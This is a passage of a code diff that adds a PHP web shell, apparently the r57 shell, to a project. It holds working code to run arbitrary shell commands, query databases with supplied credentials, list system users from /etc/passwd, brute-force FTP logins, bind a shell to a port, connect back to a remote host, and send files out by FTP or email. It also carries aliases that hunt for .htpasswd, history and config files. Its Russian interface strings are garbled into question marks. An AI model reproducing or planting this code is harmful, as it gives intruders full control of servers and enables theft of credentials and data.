$values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'???????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text77'=>'???????? ????????? ???? ??????', +'ru_text78'=>'?????????? ???????', +'ru_text79'=>'?????????? ???????', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>?</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('?? ??????? ????????? ??????','?????? ??????????'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = 